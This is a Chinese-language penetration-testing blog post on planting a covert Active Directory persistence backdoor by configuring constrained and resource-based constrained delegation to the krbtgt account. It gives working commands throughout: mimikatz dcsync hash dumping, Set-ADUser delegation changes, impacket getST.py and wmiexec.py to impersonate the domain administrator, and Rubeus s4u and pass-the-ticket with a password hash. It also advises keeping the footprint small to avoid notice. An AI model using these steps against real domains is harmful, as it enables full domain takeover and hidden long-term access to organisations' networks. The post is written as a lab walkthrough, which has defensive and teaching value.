選擇控制的用戶

已經(jīng)存在的有SPN的域用戶

自己創(chuàng)建的機器賬號

自己創(chuàng)建的域用戶然后賦予SPN

利用約束性委派打造隱蔽后門(權(quán)限維持)

利用基于資源的約束委派打造隱蔽后門(權(quán)限維持)

在Kali上使用impacket進行攻擊

在Win7上使用Rubeus進行攻擊

關(guān)于委派以及委派的一些攻擊手法，傳送門：域滲透之委派攻擊

如果這里我們假設(shè)服務(wù)B為krbtgt，服務(wù)A為我們控制的一個賬號。配置服務(wù)A到服務(wù)B的約束性委派或者基于資源的約束性委派，那么我們控制的賬戶就可以獲取KDC（Key Distribution Centre）服務(wù)的ST服務(wù)票據(jù)(也就是TGT認購權(quán)證)。于是我們就可以偽造任何權(quán)限用戶的TGT認購權(quán)證，來打造一個變種的黃金票據(jù)了

選擇控制的用戶

這里我們配置krbtgt允許服務(wù)A基于資源的約束委派。這里的服務(wù)A我們可以有以下幾類：

1.?已經(jīng)存在的有SPN的域用戶

2.?自己創(chuàng)建的機器賬號，但是要注意計算機賬號密碼的自動更新問題

3.?自己創(chuàng)建的域用戶然后賦予SPN

在實戰(zhàn)中，建議用第一種已經(jīng)存在SPN的域用戶，因為這樣可以避免新建用戶，實現(xiàn)動靜最小化。

已經(jīng)存在的有SPN的域用戶

使用以下命令我們可以尋找具備SPN并且密碼永不過期的用戶賬戶。但是由于我們是測試環(huán)境，所以未配置該類型的賬號。真實的企業(yè)環(huán)境中這種情況非常常見，比如許多服務(wù)賬戶就會滿足這種條件。

Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires | ?{($_ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}

這里比如我們找到了test用戶屬于這種要求，然后使用mimikatz的以下命令導(dǎo)出test用戶的hash值，用于之后的攻擊。

mimikatz "lsadump::dcsync /domain:xie.com /user:test"

自己創(chuàng)建的機器賬號

我們可以自己創(chuàng)建一個機器賬號ServiceA

這種方法有唯一一個限制條件：計算機賬戶密碼的自動更新問題。（默認情況下）每隔30天，計算機賬戶密碼就會自動更新，對應(yīng)的憑據(jù)也會發(fā)生變化，使后門失去作用。攻擊者可以使用如下方法禁止該賬號密碼自動更新。

自己創(chuàng)建的域用戶然后賦予SPN

我們還可以自己創(chuàng)建一個域用戶，然后賦予SPN

利用約束性委派打造隱蔽后門(權(quán)限維持)

我們控制的用戶選擇的是自己創(chuàng)建的?test 域用戶。

·?域控：win2008 ?192.168.10.131

·?域：xie.com

·?攻擊機：Kali

首先修改?kali 的/etc/hosts/文件，添加如下內(nèi)容

192.168.10.131 win2008192.168.10.131 xie.com

然后在域控上配置test用戶到krbtgt用戶的約束性委派。?

在Kali上進行攻擊

./getST.py -dc-ip 192.168.10.131 -spn krbtgt/XIE.COM -impersonate administrator xie.com/test:x123456.\/export KRB5CCNAME=administrator.ccache./wmiexec.py -no-pass -k administrator@win2008 -dc-ip 192.168.10.131

利用基于資源的約束委派打造隱蔽后門(權(quán)限維持)

·?域控：Win2012 ??192.168.10.24

·?域成員主機：Win7 ?192.168.10.130

·?普通域用戶：xie\hack

首先修改?kali 的/etc/hosts/文件，添加如下內(nèi)容

192.168.10.24 win2012

192.168.10.24 xie.com

配置基于資源的約束委派

這里我們用剛剛新建的test用戶作為服務(wù)A，配置用戶 test 到 krbtgt 的基于資源的約束委派

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount testGet-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

在Kali上使用impacket進行攻擊

./getST.py -dc-ip 192.168.10.24 -spn krbtgt -impersonate administrator xie.com/test:x123456.\/export KRB5CCNAME=administrator.ccache./wmiexec.py -no-pass -k administrator@win2012 -dc-ip 192.168.10.24

在Win7上使用Rubeus進行攻擊

現(xiàn)在我們在Win7上用普通域用戶 xie\hack 使用Rubeus進行基于資源的約束性委派攻擊

這下面的rc4是剛剛新建的test用戶的密碼哈希，我們也可以使用aes256來進行認證。服務(wù)我們設(shè)置為 krbtgt

Rubeus.exe s4u /user:test /rc4:b98e75b5ff7a3d3ff05e07f211ebe7a8 /domain:xie.com /msdsspn:krbtgt /impersonateuser:administrator

導(dǎo)入票據(jù)，訪問域控

Rubeus.exe  ptt  /ticket:票據(jù)

參考文章：https://www.anquanke.com/post/id/170535

來源：謝公子的博客

責(zé)編：涼粉

由于文章篇幅較長，請大家耐心。如果文中有錯誤的地方，歡迎指出。有想轉(zhuǎn)載的，可以留言我加白名單。

最后，歡迎加入謝公子的小黑屋（安全交流群）(QQ群：783820465)

內(nèi)網(wǎng)滲透 | 利用委派打造隱蔽后門(權(quán)限維持)

已經(jīng)存在的有SPN的域用戶

自己創(chuàng)建的機器賬號

自己創(chuàng)建的域用戶然后賦予SPN

利用約束性委派打造隱蔽后門(權(quán)限維持)

利用基于資源的約束委派打造隱蔽后門(權(quán)限維持)

在Kali上使用impacket進行攻擊

在Win7上使用Rubeus進行攻擊